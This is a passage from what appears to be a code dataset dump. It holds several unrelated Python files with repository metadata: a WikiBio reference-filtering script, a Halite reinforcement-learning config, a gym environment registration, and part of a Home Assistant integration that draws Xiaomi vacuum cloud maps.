mlkshk.add_link(h, tag='history').save()
party = Participation(
role='Creator and designer',
start_month=11,
start_year=2010,
)
party.save()
party.add_link(mlkshk, tag='project')
party.add_link(amber, tag='maker')
party.save()
amber.add_link(party, tag='participation')
amber.save()
mlkshk.add_link(party, tag='participation')
mlkshk.save()
h = History(
action='addparty',
reason='worked with amber on that',
when=now.next(),
old_data={},
new_data=party.get_entity_data(),
).add_link(editor, tag='user').add_link(amber, tag='maker').add_link(mlkshk, tag='project')
h.save()
amber.add_link(h, tag='history').save()
mlkshk.add_link(h, tag='history').save()
party = Participation(
role='Contract API programmer & test writer',
start_month=4,
start_year=2011,
end_month=5,
end_year=2011,
)
party.save()
party.add_link(me, tag='maker')
party.add_link(mlkshk, tag='project')
party.save()
me.add_link(party, tag='participation')
me.save()
mlkshk.add_link(party, tag='participation')
mlkshk.save()
h = History(
action='addparty',
reason='i worked on that',
when=now.next(),
old_data={},
new_data=party.get_entity_data(),
).add_link(editor, tag='user').add_link(me, tag='maker').add_link(mlkshk, tag='project')
h.save()
me.add_link(h, tag='history').save()
mlkshk.add_link(h, tag='history').save()
anildash = Maker(
'anildash',
name='Anil Dash',
html_url='http://dashes.com/anil/about.html',
avatar_url='https://si0.twimg.com/profile_images/1364557668/image_reasonably_small.jpg',
)
anildash.save()
h = History(
action='addmaker',
reason='new maker',
when=now.next(),
old_data={},
new_data=anildash.get_entity_data(),
).add_link(editor, tag='user').add_link(anildash, tag='maker')
h.save()
anildash.add_link(h, tag='history').save()
| true
| true
|
1c421ddfb599c1e298cfa6ac646ba1826abb9a61
| 3,595
|
py
|
Python
|
data/filter_dataset.py
|
KaijuML/dtt-multi-branch
|
a49850a95034e58d387b9d48c647cfc2b83c45b5
|
[
"Apache-2.0"
] | 8
|
2021-02-25T08:19:55.000Z
|
2022-03-12T06:25:36.000Z
|
data/filter_dataset.py
|
KaijuML/dtt-multi-branch
|
a49850a95034e58d387b9d48c647cfc2b83c45b5
|
[
"Apache-2.0"
] | 5
|
2021-05-20T19:11:58.000Z
|
2021-07-14T07:46:33.000Z
|
data/filter_dataset.py
|
KaijuML/dtt-multi-branch
|
a49850a95034e58d387b9d48c647cfc2b83c45b5
|
[
"Apache-2.0"
] | null | null | null |
"""
This scripts filters the references from WikiBIO using our custom token score function
For now, only token with a score > 0 are kept.
"""
from utils import FileIterable, TaggedFileIterable
import multiprocessing as mp
import argparse
import tqdm
import os
if __name__ == '__main__':
parser = argparse.ArgumentParser()
    group = parser.add_argument_group('How to configure paths')
group.add_argument('--dest', dest='dest', required=True,
help='Where to store the filtered references')
group.add_argument('--scores', dest='scores', required=True,
help='Each line is (token, score) separated by \\t ' \
'Sentences are separated by an empty line')
group.add_argument('--refs', dest='refs', required=True,
help='Reference file. One sentence per line.')
group.add_argument('--threshold', dest='threshold', type=float, default=0,
help='Only keep tokens with a score <= threshold')
group = parser.add_argument_group('Arguments regarding multiprocessing')
group.add_argument('--n_jobs', dest='n_jobs', type=int, default=-1,
help='number of processes to use. <0 for cpu_count()')
group.add_argument('--chunksize', dest='chunksize', type=int, default=10,
help='chunksize to use in mp.Pool().imap()' \
'Change this if you know what you are doing.')
args = parser.parse_args()
if not 0 <= args.threshold <= 1:
        raise ValueError('threshold should be between 0 and 1. '
                         f'Got {args.threshold}')
if not args.chunksize > 0:
print('\nWARNING:',
'Expected chunksize to be a non-zero positive integer.',
f'Instead got {args.chunksize}.',
'Instead, chunksize=1 will be used')
args.chunksize = 1
if os.path.exists(args.dest):
print('\nWARNING:',
f'{args.dest} already exists, it will be overwritten.',
'Stop the process ASAP to avoid this\n')
else:
# we use this touch to verify dest is a valid path
# so that the script does not run if it's not the case
with open(args.dest, mode="w", encoding='utf8') as f:
pass
references = FileIterable.from_filename(args.refs)
scored_references = TaggedFileIterable.from_filename(args.scores,
func=lambda x, s: (x, float(s)))
zipped_inputs = [
item for item in tqdm.tqdm(
zip(references, scored_references),
desc='Reading files',
total=len(references)
)
]
def deal_with_one_instance(zipped_args):
ref, scored_ref = zipped_args
filtered_ref = list()
for token, (_, score) in zip(ref, scored_ref):
if score <= args.threshold:
filtered_ref.append(token)
return ' '.join(filtered_ref)
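    # Worked example (illustration only; tokens and scores are made up): with
    # the default threshold of 0, the reference ["john", "smith", "was",
    # "famous"] paired with scores [("john", 0.0), ("smith", 0.0),
    # ("was", 0.0), ("famous", 0.8)] is filtered down to "john smith was",
    # because only tokens whose score is <= the threshold are kept.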
n_jobs = mp.cpu_count() if args.n_jobs < 0 else args.n_jobs
print(f'Using {n_jobs} processes, starting now')
with open(args.dest, mode="w", encoding='utf8') as f, mp.Pool(processes=n_jobs) as pool:
_iterable = pool.imap(
deal_with_one_instance,
zipped_inputs,
chunksize=args.chunksize
)
for filtered_reference in tqdm.tqdm(
_iterable, total=len(references), desc='Filtering references'):
f.write(f'{filtered_reference}\n')
| 39.505495
| 92
| 0.588595
|
from utils import FileIterable, TaggedFileIterable
import multiprocessing as mp
import argparse
import tqdm
import os
if __name__ == '__main__':
parser = argparse.ArgumentParser()
    group = parser.add_argument_group('How to configure paths')
group.add_argument('--dest', dest='dest', required=True,
help='Where to store the filtered references')
group.add_argument('--scores', dest='scores', required=True,
help='Each line is (token, score) separated by \\t ' \
'Sentences are separated by an empty line')
group.add_argument('--refs', dest='refs', required=True,
help='Reference file. One sentence per line.')
group.add_argument('--threshold', dest='threshold', type=float, default=0,
help='Only keep tokens with a score <= threshold')
group = parser.add_argument_group('Arguments regarding multiprocessing')
group.add_argument('--n_jobs', dest='n_jobs', type=int, default=-1,
help='number of processes to use. <0 for cpu_count()')
group.add_argument('--chunksize', dest='chunksize', type=int, default=10,
help='chunksize to use in mp.Pool().imap()' \
'Change this if you know what you are doing.')
args = parser.parse_args()
if not 0 <= args.threshold <= 1:
        raise ValueError('threshold should be between 0 and 1. '
                         f'Got {args.threshold}')
if not args.chunksize > 0:
print('\nWARNING:',
'Expected chunksize to be a non-zero positive integer.',
f'Instead got {args.chunksize}.',
'Instead, chunksize=1 will be used')
args.chunksize = 1
if os.path.exists(args.dest):
print('\nWARNING:',
f'{args.dest} already exists, it will be overwritten.',
'Stop the process ASAP to avoid this\n')
else:
with open(args.dest, mode="w", encoding='utf8') as f:
pass
references = FileIterable.from_filename(args.refs)
scored_references = TaggedFileIterable.from_filename(args.scores,
func=lambda x, s: (x, float(s)))
zipped_inputs = [
item for item in tqdm.tqdm(
zip(references, scored_references),
desc='Reading files',
total=len(references)
)
]
def deal_with_one_instance(zipped_args):
ref, scored_ref = zipped_args
filtered_ref = list()
for token, (_, score) in zip(ref, scored_ref):
if score <= args.threshold:
filtered_ref.append(token)
return ' '.join(filtered_ref)
n_jobs = mp.cpu_count() if args.n_jobs < 0 else args.n_jobs
print(f'Using {n_jobs} processes, starting now')
with open(args.dest, mode="w", encoding='utf8') as f, mp.Pool(processes=n_jobs) as pool:
_iterable = pool.imap(
deal_with_one_instance,
zipped_inputs,
chunksize=args.chunksize
)
for filtered_reference in tqdm.tqdm(
_iterable, total=len(references), desc='Filtering references'):
f.write(f'{filtered_reference}\n')
| true
| true
|
1c421de3392afbd8279bdc95c2597c5b7c2a09fc
| 1,381
|
py
|
Python
|
examples/Baselines/Halite_competition/torch/config.py
|
lp2333/PARL
|
e4bde1f5b7e69c5f8d3ee3a90a647dfe12204bd3
|
[
"ECL-2.0",
"Apache-2.0"
] | 3,172
|
2018-05-22T02:02:29.000Z
|
2022-03-31T09:14:56.000Z
|
examples/Baselines/Halite_competition/torch/config.py
|
BKBK00/PARL
|
f508bc6085420431b504441c7ff129e64826603e
|
[
"Apache-2.0"
] | 422
|
2018-05-17T16:58:45.000Z
|
2022-03-31T02:03:25.000Z
|
examples/Baselines/Halite_competition/torch/config.py
|
BKBK00/PARL
|
f508bc6085420431b504441c7ff129e64826603e
|
[
"Apache-2.0"
] | 794
|
2018-05-21T18:33:19.000Z
|
2022-03-30T13:38:09.000Z
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
config = {
# configuration for env
"board_size": 21,
# configuration for training
"episodes": 10000,
"batch_size": 128,
"train_times": 2,
"gamma": 0.997,
"lr": 0.0001,
"test_every_episode": 100,
# configuration for ppo algorithm
"vf_loss_coef": 1,
"ent_coef": 0.01,
# configuration for the observation of ships
"world_dim": 5 * 21 * 21,
"ship_obs_dim": 6,
"ship_act_dim": 5,
"ship_max_step": 10000,
# the number of halite we want the ships to obtain (e.g K)
"num_halite": 100,
# the maximum number of ships (e.g M)
"num_ships": 10,
# seed for training
"seed": 123456,
# configuration for logging
"log_path": './train_log/',
"save_path": './save_model/',
}
| 27.078431
| 74
| 0.669804
|
config = {
"board_size": 21,
"episodes": 10000,
"batch_size": 128,
"train_times": 2,
"gamma": 0.997,
"lr": 0.0001,
"test_every_episode": 100,
"vf_loss_coef": 1,
"ent_coef": 0.01,
"world_dim": 5 * 21 * 21,
"ship_obs_dim": 6,
"ship_act_dim": 5,
"ship_max_step": 10000,
"num_halite": 100,
"num_ships": 10,
"seed": 123456,
"log_path": './train_log/',
"save_path": './save_model/',
}
| true
| true
|
1c421e40cbc61c50529786cd59cc92e00d2cf13d
| 143
|
py
|
Python
|
gym-battleship-basic/gym_battleship_basic/__init__.py
|
xwx1989119/Battleship
|
518f0211d898c0ed20bf2a14c1b1b5750b371f25
|
[
"MIT"
] | null | null | null |
gym-battleship-basic/gym_battleship_basic/__init__.py
|
xwx1989119/Battleship
|
518f0211d898c0ed20bf2a14c1b1b5750b371f25
|
[
"MIT"
] | null | null | null |
gym-battleship-basic/gym_battleship_basic/__init__.py
|
xwx1989119/Battleship
|
518f0211d898c0ed20bf2a14c1b1b5750b371f25
|
[
"MIT"
] | null | null | null |
from gym.envs.registration import register
register(
id='battleshipBasic-v0',
entry_point='gym_battleship_basic.envs:BattleshipEnv',
)
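# Usage sketch (assumption; not part of this package file): after ``import gym``
# and ``import gym_battleship_basic``, the environment registered above can be
# created with ``env = gym.make('battleshipBasic-v0')``.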
| 23.833333
| 58
| 0.783217
|
from gym.envs.registration import register
register(
id='battleshipBasic-v0',
entry_point='gym_battleship_basic.envs:BattleshipEnv',
)
| true
| true
|
1c421fb628459617e362cb622c3fe92548a7c650
| 17,918
|
py
|
Python
|
custom_components/xiaomi_cloud_map_extractor/camera.py
|
GuyKh/Home-Assistant-custom-components-Xiaomi-Cloud-Map-Extractor
|
65e0a905fdb6048facdb34cbec40b7ece4fef991
|
[
"MIT"
] | 697
|
2020-09-30T08:35:58.000Z
|
2022-03-31T17:14:20.000Z
|
custom_components/xiaomi_cloud_map_extractor/camera.py
|
GuyKh/Home-Assistant-custom-components-Xiaomi-Cloud-Map-Extractor
|
65e0a905fdb6048facdb34cbec40b7ece4fef991
|
[
"MIT"
] | 216
|
2020-10-01T12:05:24.000Z
|
2022-03-31T11:35:46.000Z
|
custom_components/xiaomi_cloud_map_extractor/camera.py
|
GuyKh/Home-Assistant-custom-components-Xiaomi-Cloud-Map-Extractor
|
65e0a905fdb6048facdb34cbec40b7ece4fef991
|
[
"MIT"
] | 92
|
2020-09-30T18:10:19.000Z
|
2022-03-24T12:15:18.000Z
|
import io
import logging
import time
from datetime import timedelta
from enum import Enum
import miio
import PIL.Image as Image
import voluptuous as vol
from homeassistant.components.camera import Camera, ENTITY_ID_FORMAT, PLATFORM_SCHEMA, SUPPORT_ON_OFF
from homeassistant.const import CONF_HOST, CONF_NAME, CONF_PASSWORD, CONF_TOKEN, CONF_USERNAME
from homeassistant.helpers import config_validation as cv
from homeassistant.helpers.entity import generate_entity_id
from homeassistant.helpers.reload import async_setup_reload_service
from custom_components.xiaomi_cloud_map_extractor.common.map_data_parser import MapDataParser
from custom_components.xiaomi_cloud_map_extractor.common.xiaomi_cloud_connector import XiaomiCloudConnector
from custom_components.xiaomi_cloud_map_extractor.const import *
from custom_components.xiaomi_cloud_map_extractor.dreame.vacuum import DreameVacuum
from custom_components.xiaomi_cloud_map_extractor.roidmi.vacuum import RoidmiVacuum
from custom_components.xiaomi_cloud_map_extractor.viomi.vacuum import ViomiVacuum
from custom_components.xiaomi_cloud_map_extractor.xiaomi.vacuum import XiaomiVacuum
_LOGGER = logging.getLogger(__name__)
SCAN_INTERVAL = timedelta(seconds=5)
DEFAULT_TRIMS = {
CONF_LEFT: 0,
CONF_RIGHT: 0,
CONF_TOP: 0,
CONF_BOTTOM: 0
}
DEFAULT_SIZES = {
CONF_SIZE_VACUUM_RADIUS: 4,
CONF_SIZE_IGNORED_OBSTACLE_RADIUS: 3,
CONF_SIZE_IGNORED_OBSTACLE_WITH_PHOTO_RADIUS: 3,
CONF_SIZE_OBSTACLE_RADIUS: 3,
CONF_SIZE_OBSTACLE_WITH_PHOTO_RADIUS: 3,
CONF_SIZE_CHARGER_RADIUS: 4
}
COLOR_SCHEMA = vol.Or(
vol.All(vol.Length(min=3, max=3), vol.ExactSequence((cv.byte, cv.byte, cv.byte)), vol.Coerce(tuple)),
vol.All(vol.Length(min=4, max=4), vol.ExactSequence((cv.byte, cv.byte, cv.byte, cv.byte)), vol.Coerce(tuple))
)
PERCENT_SCHEMA = vol.All(vol.Coerce(float), vol.Range(min=0, max=100))
POSITIVE_FLOAT_SCHEMA = vol.All(vol.Coerce(float), vol.Range(min=0))
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_HOST): cv.string,
vol.Required(CONF_TOKEN): vol.All(str, vol.Length(min=32, max=32)),
vol.Required(CONF_USERNAME): cv.string,
vol.Required(CONF_PASSWORD): cv.string,
vol.Optional(CONF_COUNTRY, default=None): vol.Or(vol.In(CONF_AVAILABLE_COUNTRIES), vol.Equal(None)),
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_AUTO_UPDATE, default=True): cv.boolean,
vol.Optional(CONF_COLORS, default={}): vol.Schema({
vol.In(CONF_AVAILABLE_COLORS): COLOR_SCHEMA
}),
vol.Optional(CONF_ROOM_COLORS, default={}): vol.Schema({
cv.positive_int: COLOR_SCHEMA
}),
vol.Optional(CONF_DRAW, default=[]): vol.All(cv.ensure_list, [vol.In(CONF_AVAILABLE_DRAWABLES)]),
vol.Optional(CONF_MAP_TRANSFORM, default={CONF_SCALE: 1, CONF_ROTATE: 0, CONF_TRIM: DEFAULT_TRIMS}):
vol.Schema({
vol.Optional(CONF_SCALE, default=1): POSITIVE_FLOAT_SCHEMA,
vol.Optional(CONF_ROTATE, default=0): vol.In([0, 90, 180, 270]),
vol.Optional(CONF_TRIM, default=DEFAULT_TRIMS): vol.Schema({
vol.Optional(CONF_LEFT, default=0): PERCENT_SCHEMA,
vol.Optional(CONF_RIGHT, default=0): PERCENT_SCHEMA,
vol.Optional(CONF_TOP, default=0): PERCENT_SCHEMA,
vol.Optional(CONF_BOTTOM, default=0): PERCENT_SCHEMA
}),
}),
vol.Optional(CONF_ATTRIBUTES, default=[]): vol.All(cv.ensure_list, [vol.In(CONF_AVAILABLE_ATTRIBUTES)]),
vol.Optional(CONF_TEXTS, default=[]):
vol.All(cv.ensure_list, [vol.Schema({
vol.Required(CONF_TEXT): cv.string,
vol.Required(CONF_X): vol.Coerce(float),
vol.Required(CONF_Y): vol.Coerce(float),
vol.Optional(CONF_COLOR, default=(0, 0, 0)): COLOR_SCHEMA,
vol.Optional(CONF_FONT, default=None): vol.Or(cv.string, vol.Equal(None)),
vol.Optional(CONF_FONT_SIZE, default=0): cv.positive_int
})]),
vol.Optional(CONF_SIZES, default=DEFAULT_SIZES): vol.Schema({
vol.Optional(CONF_SIZE_VACUUM_RADIUS,
default=DEFAULT_SIZES[CONF_SIZE_VACUUM_RADIUS]): POSITIVE_FLOAT_SCHEMA,
vol.Optional(CONF_SIZE_IGNORED_OBSTACLE_RADIUS,
default=DEFAULT_SIZES[CONF_SIZE_IGNORED_OBSTACLE_RADIUS]): POSITIVE_FLOAT_SCHEMA,
vol.Optional(CONF_SIZE_IGNORED_OBSTACLE_WITH_PHOTO_RADIUS,
default=DEFAULT_SIZES[CONF_SIZE_IGNORED_OBSTACLE_WITH_PHOTO_RADIUS]): POSITIVE_FLOAT_SCHEMA,
vol.Optional(CONF_SIZE_OBSTACLE_RADIUS,
default=DEFAULT_SIZES[CONF_SIZE_OBSTACLE_RADIUS]): POSITIVE_FLOAT_SCHEMA,
vol.Optional(CONF_SIZE_OBSTACLE_WITH_PHOTO_RADIUS,
default=DEFAULT_SIZES[CONF_SIZE_OBSTACLE_WITH_PHOTO_RADIUS]): POSITIVE_FLOAT_SCHEMA,
vol.Optional(CONF_SIZE_CHARGER_RADIUS,
default=DEFAULT_SIZES[CONF_SIZE_CHARGER_RADIUS]): POSITIVE_FLOAT_SCHEMA
}),
vol.Optional(CONF_STORE_MAP_RAW, default=False): cv.boolean,
vol.Optional(CONF_STORE_MAP_IMAGE, default=False): cv.boolean,
vol.Optional(CONF_STORE_MAP_PATH, default="/tmp"): cv.string,
vol.Optional(CONF_FORCE_API, default=None): vol.Or(vol.In(CONF_AVAILABLE_APIS), vol.Equal(None))
})
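# Configuration sketch (illustration only; the platform name and all values are
# placeholders inferred from the schema above, not taken from the integration's
# documentation): a minimal camera platform entry needs host, token, username
# and password, everything else is optional, e.g. in YAML:
#
#     camera:
#       - platform: xiaomi_cloud_map_extractor
#         host: 192.168.1.2
#         token: !secret vacuum_token
#         username: !secret xiaomi_cloud_username
#         password: !secret xiaomi_cloud_password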
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
await async_setup_reload_service(hass, DOMAIN, PLATFORMS)
host = config[CONF_HOST]
token = config[CONF_TOKEN]
username = config[CONF_USERNAME]
password = config[CONF_PASSWORD]
country = config[CONF_COUNTRY]
name = config[CONF_NAME]
should_poll = config[CONF_AUTO_UPDATE]
image_config = config[CONF_MAP_TRANSFORM]
colors = config[CONF_COLORS]
room_colors = config[CONF_ROOM_COLORS]
for room, color in room_colors.items():
colors[f"{COLOR_ROOM_PREFIX}{room}"] = color
drawables = config[CONF_DRAW]
sizes = config[CONF_SIZES]
texts = config[CONF_TEXTS]
if DRAWABLE_ALL in drawables:
drawables = CONF_AVAILABLE_DRAWABLES[1:]
attributes = config[CONF_ATTRIBUTES]
store_map_raw = config[CONF_STORE_MAP_RAW]
store_map_image = config[CONF_STORE_MAP_IMAGE]
store_map_path = config[CONF_STORE_MAP_PATH]
force_api = config[CONF_FORCE_API]
entity_id = generate_entity_id(ENTITY_ID_FORMAT, name, hass=hass)
async_add_entities([VacuumCamera(entity_id, host, token, username, password, country, name, should_poll,
image_config, colors, drawables, sizes, texts, attributes, store_map_raw,
store_map_image, store_map_path, force_api)])
class VacuumCamera(Camera):
def __init__(self, entity_id, host, token, username, password, country, name, should_poll, image_config, colors,
drawables, sizes, texts, attributes, store_map_raw, store_map_image, store_map_path, force_api):
super().__init__()
self.entity_id = entity_id
self.content_type = CONTENT_TYPE
self._vacuum = miio.Vacuum(host, token)
self._connector = XiaomiCloudConnector(username, password)
self._status = CameraStatus.INITIALIZING
self._device = None
self._name = name
self._should_poll = should_poll
self._image_config = image_config
self._colors = colors
self._drawables = drawables
self._sizes = sizes
self._texts = texts
self._attributes = attributes
self._store_map_raw = store_map_raw
self._store_map_image = store_map_image
self._store_map_path = store_map_path
self._forced_api = force_api
self._used_api = None
self._map_saved = None
self._image = None
self._map_data = None
self._logged_in = False
self._logged_in_previously = True
self._received_map_name_previously = True
self._country = country
async def async_added_to_hass(self) -> None:
self.async_schedule_update_ha_state(True)
@property
def frame_interval(self):
return 1
def camera_image(self):
return self._image
@property
def name(self):
return self._name
def turn_on(self):
self._should_poll = True
def turn_off(self):
self._should_poll = False
@property
def supported_features(self):
return SUPPORT_ON_OFF
@property
def device_state_attributes(self):
attributes = {}
if self._map_data is not None:
rooms = []
if self._map_data.rooms is not None:
rooms = dict(
filter(lambda x: x[0] is not None, map(lambda x: (x[0], x[1].name), self._map_data.rooms.items())))
if len(rooms) == 0:
rooms = list(self._map_data.rooms.keys())
for name, value in {
ATTRIBUTE_CALIBRATION: self._map_data.calibration(),
ATTRIBUTE_CHARGER: self._map_data.charger,
ATTRIBUTE_CLEANED_ROOMS: self._map_data.cleaned_rooms,
ATTRIBUTE_COUNTRY: self._country,
ATTRIBUTE_GOTO: self._map_data.goto,
ATTRIBUTE_GOTO_PATH: self._map_data.goto_path,
ATTRIBUTE_GOTO_PREDICTED_PATH: self._map_data.predicted_path,
ATTRIBUTE_IGNORED_OBSTACLES: self._map_data.ignored_obstacles,
ATTRIBUTE_IGNORED_OBSTACLES_WITH_PHOTO: self._map_data.ignored_obstacles_with_photo,
ATTRIBUTE_IMAGE: self._map_data.image,
ATTRIBUTE_IS_EMPTY: self._map_data.image.is_empty,
ATTRIBUTE_MAP_NAME: self._map_data.map_name,
ATTRIBUTE_NO_GO_AREAS: self._map_data.no_go_areas,
ATTRIBUTE_NO_MOPPING_AREAS: self._map_data.no_mopping_areas,
ATTRIBUTE_OBSTACLES: self._map_data.obstacles,
ATTRIBUTE_OBSTACLES_WITH_PHOTO: self._map_data.obstacles_with_photo,
ATTRIBUTE_PATH: self._map_data.path,
ATTRIBUTE_ROOM_NUMBERS: rooms,
ATTRIBUTE_ROOMS: self._map_data.rooms,
ATTRIBUTE_VACUUM_POSITION: self._map_data.vacuum_position,
ATTRIBUTE_VACUUM_ROOM: self._map_data.vacuum_room,
ATTRIBUTE_VACUUM_ROOM_NAME: self._map_data.vacuum_room_name,
ATTRIBUTE_WALLS: self._map_data.walls,
ATTRIBUTE_ZONES: self._map_data.zones
}.items():
if name in self._attributes:
attributes[name] = value
if self._store_map_raw:
attributes[ATTRIBUTE_MAP_SAVED] = self._map_saved
if self._device is not None:
attributes[ATTR_MODEL] = self._device.model
attributes[ATTR_USED_API] = self._used_api
return attributes
@property
def should_poll(self):
return self._should_poll
def update(self):
counter = 10
if self._status != CameraStatus.TWO_FACTOR_AUTH_REQUIRED and not self._logged_in:
self._handle_login()
if self._device is None and self._logged_in:
self._handle_device()
map_name = self._handle_map_name(counter)
if map_name == "retry" and self._device is not None:
self._status = CameraStatus.FAILED_TO_RETRIEVE_MAP_FROM_VACUUM
self._received_map_name_previously = map_name != "retry"
if self._logged_in and map_name != "retry" and self._device is not None:
self._handle_map_data(map_name)
else:
_LOGGER.debug("Unable to retrieve map, reasons: Logged in - %s, map name - %s, device retrieved - %s",
self._logged_in, map_name, self._device is not None)
self._set_map_data(MapDataParser.create_empty(self._colors, str(self._status)))
self._logged_in_previously = self._logged_in
def _handle_login(self):
_LOGGER.debug("Logging in...")
self._logged_in = self._connector.login()
if self._logged_in is None:
_LOGGER.debug("2FA required")
self._status = CameraStatus.TWO_FACTOR_AUTH_REQUIRED
elif self._logged_in:
_LOGGER.debug("Logged in")
self._status = CameraStatus.LOGGED_IN
else:
_LOGGER.debug("Failed to log in")
self._status = CameraStatus.FAILED_LOGIN
if self._logged_in_previously:
_LOGGER.error("Unable to log in, check credentials")
def _handle_device(self):
_LOGGER.debug("Retrieving device info, country: %s", self._country)
country, user_id, device_id, model = self._connector.get_device_details(self._vacuum.token, self._country)
if model is not None:
self._country = country
_LOGGER.debug("Retrieved device model: %s", model)
self._device = self._create_device(user_id, device_id, model)
_LOGGER.debug("Created device, used api: %s", self._used_api)
else:
_LOGGER.error("Failed to retrieve model")
self._status = CameraStatus.FAILED_TO_RETRIEVE_DEVICE
def _handle_map_name(self, counter):
map_name = "retry"
if self._device is not None and not self._device.should_get_map_from_vacuum():
map_name = "0"
while map_name == "retry" and counter > 0:
_LOGGER.debug("Retrieving map name from device")
time.sleep(0.1)
try:
map_name = self._vacuum.map()[0]
_LOGGER.debug("Map name %s", map_name)
except OSError as exc:
_LOGGER.error("Got OSError while fetching the state: %s", exc)
except miio.DeviceException as exc:
if self._received_map_name_previously:
_LOGGER.warning("Got exception while fetching the state: %s", exc)
self._received_map_name_previously = False
finally:
counter = counter - 1
return map_name
def _handle_map_data(self, map_name):
_LOGGER.debug("Retrieving map from Xiaomi cloud")
store_map_path = self._store_map_path if self._store_map_raw else None
map_data, map_stored = self._device.get_map(map_name, self._colors, self._drawables, self._texts,
self._sizes, self._image_config, store_map_path)
if map_data is not None:
# noinspection PyBroadException
try:
_LOGGER.debug("Map data retrieved")
self._set_map_data(map_data)
self._map_saved = map_stored
if self._map_data.image.is_empty:
_LOGGER.debug("Map is empty")
self._status = CameraStatus.EMPTY_MAP
else:
_LOGGER.debug("Map is ok")
self._status = CameraStatus.OK
except:
_LOGGER.warning("Unable to parse map data")
self._status = CameraStatus.UNABLE_TO_PARSE_MAP
else:
self._logged_in = False
_LOGGER.warning("Unable to retrieve map data")
self._status = CameraStatus.UNABLE_TO_RETRIEVE_MAP
def _set_map_data(self, map_data):
img_byte_arr = io.BytesIO()
map_data.image.data.save(img_byte_arr, format='PNG')
self._image = img_byte_arr.getvalue()
self._map_data = map_data
self._store_image()
def _create_device(self, user_id, device_id, model):
self._used_api = self._detect_api(model)
if self._used_api == CONF_AVAILABLE_API_XIAOMI:
return XiaomiVacuum(self._connector, self._country, user_id, device_id, model)
if self._used_api == CONF_AVAILABLE_API_VIOMI:
return ViomiVacuum(self._connector, self._country, user_id, device_id, model)
if self._used_api == CONF_AVAILABLE_API_ROIDMI:
return RoidmiVacuum(self._connector, self._country, user_id, device_id, model)
if self._used_api == CONF_AVAILABLE_API_DREAME:
return DreameVacuum(self._connector, self._country, user_id, device_id, model)
return XiaomiVacuum(self._connector, self._country, user_id, device_id, model)
def _detect_api(self, model: str):
if self._forced_api is not None:
return self._forced_api
if model in API_EXCEPTIONS:
return API_EXCEPTIONS[model]
def list_contains_model(prefixes):
return len(list(filter(lambda x: model.startswith(x), prefixes))) > 0
filtered = list(filter(lambda x: list_contains_model(x[1]), AVAILABLE_APIS.items()))
if len(filtered) > 0:
return filtered[0][0]
return CONF_AVAILABLE_API_XIAOMI
def _store_image(self):
if self._store_map_image:
try:
image = Image.open(io.BytesIO(self._image))
image.save(f"{self._store_map_path}/map_image_{self._device.model}.png")
except:
_LOGGER.warning("Error while saving image")
class CameraStatus(Enum):
EMPTY_MAP = 'Empty map'
FAILED_LOGIN = 'Failed to login'
FAILED_TO_RETRIEVE_DEVICE = 'Failed to retrieve device'
FAILED_TO_RETRIEVE_MAP_FROM_VACUUM = 'Failed to retrieve map from vacuum'
INITIALIZING = 'Initializing'
NOT_LOGGED_IN = 'Not logged in'
OK = 'OK'
LOGGED_IN = 'Logged in'
TWO_FACTOR_AUTH_REQUIRED = 'Two factor auth required (see logs)'
UNABLE_TO_PARSE_MAP = 'Unable to parse map'
UNABLE_TO_RETRIEVE_MAP = 'Unable to retrieve map'
def __str__(self):
return str(self._value_)
| 45.592875
| 119
| 0.661904
|
import io
import logging
import time
from datetime import timedelta
from enum import Enum
import miio
import PIL.Image as Image
import voluptuous as vol
from homeassistant.components.camera import Camera, ENTITY_ID_FORMAT, PLATFORM_SCHEMA, SUPPORT_ON_OFF
from homeassistant.const import CONF_HOST, CONF_NAME, CONF_PASSWORD, CONF_TOKEN, CONF_USERNAME
from homeassistant.helpers import config_validation as cv
from homeassistant.helpers.entity import generate_entity_id
from homeassistant.helpers.reload import async_setup_reload_service
from custom_components.xiaomi_cloud_map_extractor.common.map_data_parser import MapDataParser
from custom_components.xiaomi_cloud_map_extractor.common.xiaomi_cloud_connector import XiaomiCloudConnector
from custom_components.xiaomi_cloud_map_extractor.const import *
from custom_components.xiaomi_cloud_map_extractor.dreame.vacuum import DreameVacuum
from custom_components.xiaomi_cloud_map_extractor.roidmi.vacuum import RoidmiVacuum
from custom_components.xiaomi_cloud_map_extractor.viomi.vacuum import ViomiVacuum
from custom_components.xiaomi_cloud_map_extractor.xiaomi.vacuum import XiaomiVacuum
_LOGGER = logging.getLogger(__name__)
SCAN_INTERVAL = timedelta(seconds=5)
DEFAULT_TRIMS = {
CONF_LEFT: 0,
CONF_RIGHT: 0,
CONF_TOP: 0,
CONF_BOTTOM: 0
}
DEFAULT_SIZES = {
CONF_SIZE_VACUUM_RADIUS: 4,
CONF_SIZE_IGNORED_OBSTACLE_RADIUS: 3,
CONF_SIZE_IGNORED_OBSTACLE_WITH_PHOTO_RADIUS: 3,
CONF_SIZE_OBSTACLE_RADIUS: 3,
CONF_SIZE_OBSTACLE_WITH_PHOTO_RADIUS: 3,
CONF_SIZE_CHARGER_RADIUS: 4
}
COLOR_SCHEMA = vol.Or(
vol.All(vol.Length(min=3, max=3), vol.ExactSequence((cv.byte, cv.byte, cv.byte)), vol.Coerce(tuple)),
vol.All(vol.Length(min=4, max=4), vol.ExactSequence((cv.byte, cv.byte, cv.byte, cv.byte)), vol.Coerce(tuple))
)
PERCENT_SCHEMA = vol.All(vol.Coerce(float), vol.Range(min=0, max=100))
POSITIVE_FLOAT_SCHEMA = vol.All(vol.Coerce(float), vol.Range(min=0))
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_HOST): cv.string,
vol.Required(CONF_TOKEN): vol.All(str, vol.Length(min=32, max=32)),
vol.Required(CONF_USERNAME): cv.string,
vol.Required(CONF_PASSWORD): cv.string,
vol.Optional(CONF_COUNTRY, default=None): vol.Or(vol.In(CONF_AVAILABLE_COUNTRIES), vol.Equal(None)),
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_AUTO_UPDATE, default=True): cv.boolean,
